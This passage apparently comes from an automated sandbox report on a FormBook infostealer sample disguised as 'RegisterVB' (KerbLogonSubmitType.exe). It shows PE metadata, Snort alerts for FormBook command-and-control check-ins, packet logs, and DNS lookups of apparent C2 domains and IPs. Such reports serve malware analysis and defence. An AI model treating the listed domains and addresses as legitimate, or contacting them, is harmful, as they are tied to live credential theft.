                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x770a40x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x780000x1000.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x750fc0x75200False0.75252009405data7.42173467133IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x780000x10000x1000False0.402587890625data5.01180684458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x7a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_VERSION0x780900x34cdata
                                                                        RT_MANIFEST0x783ec0xc0fXML 1.0 document, UTF-8 Unicode (with BOM) text

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0000 0x04b0
                                                                        LegalCopyrightCopyright 2018
                                                                        Assembly Version1.0.0.0
                                                                        InternalNameKerbLogonSubmitType.exe
                                                                        FileVersion1.0.0.0
                                                                        CompanyName
                                                                        LegalTrademarks
                                                                        Comments
                                                                        ProductNameRegisterVB
                                                                        ProductVersion1.0.0.0
                                                                        FileDescriptionRegisterVB
                                                                        OriginalFilenameKerbLogonSubmitType.exe

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        02/23/21-09:00:28.246241ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                        02/23/21-09:00:33.481128TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.394.73.146.42
                                                                        02/23/21-09:00:33.481128TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.394.73.146.42
                                                                        02/23/21-09:00:33.481128TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.394.73.146.42
                                                                        02/23/21-09:00:38.674968TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.334.102.136.180
                                                                        02/23/21-09:00:38.674968TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.334.102.136.180
                                                                        02/23/21-09:00:38.674968TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.334.102.136.180
                                                                        02/23/21-09:00:38.814055TCP1201ATTACK-RESPONSES 403 Forbidden804973134.102.136.180192.168.2.3
                                                                        02/23/21-09:00:44.103740TCP1201ATTACK-RESPONSES 403 Forbidden804973734.102.136.180192.168.2.3
                                                                        02/23/21-09:00:49.240714TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.334.102.136.180
                                                                        02/23/21-09:00:49.240714TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.334.102.136.180
                                                                        02/23/21-09:00:49.240714TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.334.102.136.180
                                                                        02/23/21-09:00:49.379719TCP1201ATTACK-RESPONSES 403 Forbidden804973834.102.136.180192.168.2.3
                                                                        02/23/21-09:00:54.643258TCP1201ATTACK-RESPONSES 403 Forbidden804974434.102.136.180192.168.2.3
                                                                        02/23/21-09:01:16.266371TCP1201ATTACK-RESPONSES 403 Forbidden804974734.102.136.180192.168.2.3
                                                                        02/23/21-09:01:32.674674TCP1201ATTACK-RESPONSES 403 Forbidden804975134.102.136.180192.168.2.3

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 23, 2021 09:00:33.407541990 CET4972480192.168.2.394.73.146.42
                                                                        Feb 23, 2021 09:00:33.480822086 CET804972494.73.146.42192.168.2.3
                                                                        Feb 23, 2021 09:00:33.481100082 CET4972480192.168.2.394.73.146.42
                                                                        Feb 23, 2021 09:00:33.481127977 CET4972480192.168.2.394.73.146.42
                                                                        Feb 23, 2021 09:00:33.554670095 CET804972494.73.146.42192.168.2.3
                                                                        Feb 23, 2021 09:00:33.554917097 CET804972494.73.146.42192.168.2.3
                                                                        Feb 23, 2021 09:00:33.554956913 CET804972494.73.146.42192.168.2.3
                                                                        Feb 23, 2021 09:00:33.554985046 CET804972494.73.146.42192.168.2.3
                                                                        Feb 23, 2021 09:00:33.555100918 CET4972480192.168.2.394.73.146.42
                                                                        Feb 23, 2021 09:00:33.555182934 CET4972480192.168.2.394.73.146.42
                                                                        Feb 23, 2021 09:00:33.564821959 CET804972494.73.146.42192.168.2.3
                                                                        Feb 23, 2021 09:00:33.564934969 CET4972480192.168.2.394.73.146.42
                                                                        Feb 23, 2021 09:00:33.628359079 CET804972494.73.146.42192.168.2.3
                                                                        Feb 23, 2021 09:00:38.633469105 CET4973180192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:38.674273014 CET804973134.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:38.674552917 CET4973180192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:38.674968004 CET4973180192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:38.715584040 CET804973134.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:38.814054966 CET804973134.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:38.814071894 CET804973134.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:38.814229012 CET4973180192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:38.814296007 CET4973180192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:38.854893923 CET804973134.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:43.922801018 CET4973780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:43.963917971 CET804973734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:43.964036942 CET4973780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:43.964195013 CET4973780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:44.005198956 CET804973734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:44.103739977 CET804973734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:44.103795052 CET804973734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:44.103934050 CET4973780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:44.103986025 CET4973780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:44.145189047 CET804973734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:49.199274063 CET4973880192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:49.240139008 CET804973834.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:49.240278006 CET4973880192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:49.240714073 CET4973880192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:49.281544924 CET804973834.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:49.379719019 CET804973834.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:49.379745007 CET804973834.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:49.379972935 CET4973880192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:49.380029917 CET4973880192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:49.421689034 CET804973834.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:54.461687088 CET4974480192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:54.502767086 CET804974434.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:54.502882957 CET4974480192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:54.503062010 CET4974480192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:54.544015884 CET804974434.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:54.643258095 CET804974434.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:54.643286943 CET804974434.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:54.643538952 CET4974480192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:54.643569946 CET4974480192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:00:54.684475899 CET804974434.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:00:59.903522968 CET4974580192.168.2.3154.80.226.18
                                                                        Feb 23, 2021 09:01:00.252563953 CET8049745154.80.226.18192.168.2.3
                                                                        Feb 23, 2021 09:01:00.252765894 CET4974580192.168.2.3154.80.226.18
                                                                        Feb 23, 2021 09:01:00.252922058 CET4974580192.168.2.3154.80.226.18
                                                                        Feb 23, 2021 09:01:00.601605892 CET8049745154.80.226.18192.168.2.3
                                                                        Feb 23, 2021 09:01:00.606403112 CET8049745154.80.226.18192.168.2.3
                                                                        Feb 23, 2021 09:01:00.606431007 CET8049745154.80.226.18192.168.2.3
                                                                        Feb 23, 2021 09:01:00.609314919 CET4974580192.168.2.3154.80.226.18
                                                                        Feb 23, 2021 09:01:00.609343052 CET4974580192.168.2.3154.80.226.18
                                                                        Feb 23, 2021 09:01:00.958373070 CET8049745154.80.226.18192.168.2.3
                                                                        Feb 23, 2021 09:01:10.870951891 CET4974680192.168.2.352.128.23.153
                                                                        Feb 23, 2021 09:01:10.922276974 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.922502995 CET4974680192.168.2.352.128.23.153
                                                                        Feb 23, 2021 09:01:10.922751904 CET4974680192.168.2.352.128.23.153
                                                                        Feb 23, 2021 09:01:10.973910093 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.973952055 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.973977089 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.973999023 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.974023104 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.974045038 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.974069118 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.974092007 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.974112988 CET804974652.128.23.153192.168.2.3
                                                                        Feb 23, 2021 09:01:10.974184990 CET4974680192.168.2.352.128.23.153
                                                                        Feb 23, 2021 09:01:10.974220037 CET4974680192.168.2.352.128.23.153
                                                                        Feb 23, 2021 09:01:10.974328995 CET4974680192.168.2.352.128.23.153
                                                                        Feb 23, 2021 09:01:16.086059093 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.126939058 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:16.127068996 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.127204895 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.167947054 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:16.266371012 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:16.266391993 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:16.266540051 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.266608953 CET4974780192.168.2.334.102.136.180
                                                                        Feb 23, 2021 09:01:16.307312965 CET804974734.102.136.180192.168.2.3
                                                                        Feb 23, 2021 09:01:27.065510988 CET4975080192.168.2.3198.185.159.144
                                                                        Feb 23, 2021 09:01:27.236430883 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.236623049 CET4975080192.168.2.3198.185.159.144
                                                                        Feb 23, 2021 09:01:27.236773014 CET4975080192.168.2.3198.185.159.144
                                                                        Feb 23, 2021 09:01:27.406384945 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410075903 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410100937 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410115957 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410130024 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410145998 CET8049750198.185.159.144192.168.2.3
                                                                        Feb 23, 2021 09:01:27.410161972 CET8049750198.185.159.144192.168.2.3

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 23, 2021 08:59:15.725260019 CET5677753192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:15.774024963 CET53567778.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:15.791728020 CET5864353192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:15.840475082 CET53586438.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:16.036062002 CET6098553192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:16.046003103 CET5020053192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:16.094485044 CET53609858.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:16.106811047 CET53502008.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:16.682037115 CET5128153192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:16.733700037 CET53512818.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:17.228666067 CET4919953192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:17.290731907 CET53491998.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:17.689059019 CET5062053192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:17.737847090 CET53506208.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:18.879532099 CET6493853192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:18.931186914 CET53649388.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:19.853307962 CET6015253192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:19.905019045 CET53601528.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:20.881572962 CET5754453192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:20.930495977 CET53575448.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:22.022630930 CET5598453192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:22.074151039 CET53559848.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:23.100560904 CET6418553192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:23.149183035 CET53641858.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:23.897679090 CET6511053192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:23.949147940 CET53651108.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:25.216830969 CET5836153192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:25.265450954 CET53583618.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:26.185484886 CET6349253192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:26.234597921 CET53634928.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:27.032710075 CET6083153192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:27.089612007 CET53608318.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:27.917500019 CET6010053192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:27.974639893 CET53601008.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:29.076859951 CET5319553192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:29.125580072 CET53531958.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:32.685682058 CET5014153192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:32.743032932 CET53501418.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:35.290663004 CET5302353192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:35.339437008 CET53530238.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:36.662890911 CET4956353192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:36.714504004 CET53495638.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:37.917320013 CET5135253192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:37.968981028 CET53513528.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:51.693639994 CET5934953192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:51.752203941 CET53593498.8.8.8192.168.2.3
                                                                        Feb 23, 2021 08:59:54.171056032 CET5708453192.168.2.38.8.8.8
                                                                        Feb 23, 2021 08:59:54.219645023 CET53570848.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:09.312968969 CET5882353192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:09.372163057 CET53588238.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:26.176038027 CET5756853192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:27.186381102 CET5756853192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:28.202013016 CET5756853192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:28.240843058 CET53575688.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:28.246145964 CET53575688.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:28.262003899 CET53575688.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:33.254621983 CET5054053192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:33.352252007 CET53505408.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:35.870695114 CET5436653192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:35.948067904 CET53543668.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:36.551553965 CET5303453192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:36.620382071 CET53530348.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:37.183090925 CET5776253192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:37.242964983 CET53577628.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:37.469012976 CET5543553192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:37.534207106 CET53554358.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:37.668474913 CET5071353192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:37.753945112 CET53507138.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:38.263458967 CET5613253192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:38.323601961 CET53561328.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:38.567380905 CET5898753192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:38.631567001 CET53589878.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:38.887336969 CET5657953192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:38.947335958 CET53565798.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:39.565145016 CET6063353192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:39.625123978 CET53606338.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:40.473942041 CET6129253192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:40.530745029 CET53612928.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:41.331619024 CET6361953192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:41.388839006 CET53636198.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:41.814295053 CET6493853192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:41.874871016 CET53649388.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:43.862653017 CET6194653192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:43.921757936 CET53619468.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:49.115926027 CET6491053192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:49.198060989 CET53649108.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:50.392818928 CET5212353192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:50.451534986 CET53521238.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:54.395446062 CET5613053192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:54.460644007 CET53561308.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:00:59.691766024 CET5633853192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:00:59.902288914 CET53563388.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:01:05.616384029 CET5942053192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:01:05.689476967 CET53594208.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:01:10.710935116 CET5878453192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:01:10.869110107 CET53587848.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:01:16.014178991 CET6397853192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:01:16.085098028 CET53639788.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:01:17.498831034 CET6293853192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:01:17.547620058 CET53629388.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:01:19.892761946 CET5570853192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:01:19.949927092 CET53557088.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:01:21.282691956 CET5680353192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:01:21.344999075 CET53568038.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:01:26.991563082 CET5714553192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:01:27.056251049 CET53571458.8.8.8192.168.2.3
                                                                        Feb 23, 2021 09:01:32.432291031 CET5535953192.168.2.38.8.8.8
                                                                        Feb 23, 2021 09:01:32.493457079 CET53553598.8.8.8192.168.2.3

                                                                        ICMP Packets

                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                        Feb 23, 2021 09:00:28.246241093 CET192.168.2.38.8.8.8d03b(Port unreachable)Destination Unreachable

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Feb 23, 2021 09:00:26.176038027 CET192.168.2.38.8.8.80x4508Standard query (0)www.fcoins.clubA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:27.186381102 CET192.168.2.38.8.8.80x4508Standard query (0)www.fcoins.clubA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:28.202013016 CET192.168.2.38.8.8.80x4508Standard query (0)www.fcoins.clubA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:33.254621983 CET192.168.2.38.8.8.80xae5dStandard query (0)www.h2oturkiye.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:38.567380905 CET192.168.2.38.8.8.80x8c97Standard query (0)www.ramjamdee.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:43.862653017 CET192.168.2.38.8.8.80x23e2Standard query (0)www.rizrvd.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:49.115926027 CET192.168.2.38.8.8.80xaf8dStandard query (0)www.gdsjgf.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:54.395446062 CET192.168.2.38.8.8.80xb35aStandard query (0)www.climaxnovels.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:59.691766024 CET192.168.2.38.8.8.80xb202Standard query (0)www.thebabyfriendly.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:05.616384029 CET192.168.2.38.8.8.80xce86Standard query (0)www.chrisbubser.digitalA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:10.710935116 CET192.168.2.38.8.8.80x2d31Standard query (0)www.wellnesssensation.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:16.014178991 CET192.168.2.38.8.8.80x886bStandard query (0)www.gallerybrows.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:21.282691956 CET192.168.2.38.8.8.80x3500Standard query (0)www.yjpps.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:26.991563082 CET192.168.2.38.8.8.80x13f5Standard query (0)www.usmedicarenow.comA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:01:32.432291031 CET192.168.2.38.8.8.80x2ed9Standard query (0)www.activagebenefits.netA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Feb 23, 2021 09:00:28.240843058 CET8.8.8.8192.168.2.30x4508Name error (3)www.fcoins.clubnonenoneA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:28.246145964 CET8.8.8.8192.168.2.30x4508Name error (3)www.fcoins.clubnonenoneA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:28.262003899 CET8.8.8.8192.168.2.30x4508Name error (3)www.fcoins.clubnonenoneA (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:33.352252007 CET8.8.8.8192.168.2.30xae5dNo error (0)www.h2oturkiye.comh2oturkiye.comCNAME (Canonical name)IN (0x0001)
                                                                        Feb 23, 2021 09:00:33.352252007 CET8.8.8.8192.168.2.30xae5dNo error (0)h2oturkiye.com94.73.146.42A (IP address)IN (0x0001)
                                                                        Feb 23, 2021 09:00:38.631567001 CET8.8.8.8192.168.2.30x8c97No error (0)www.ramjamdee.comramjamdee.comCNAME (Canonical name)IN (0x0001)
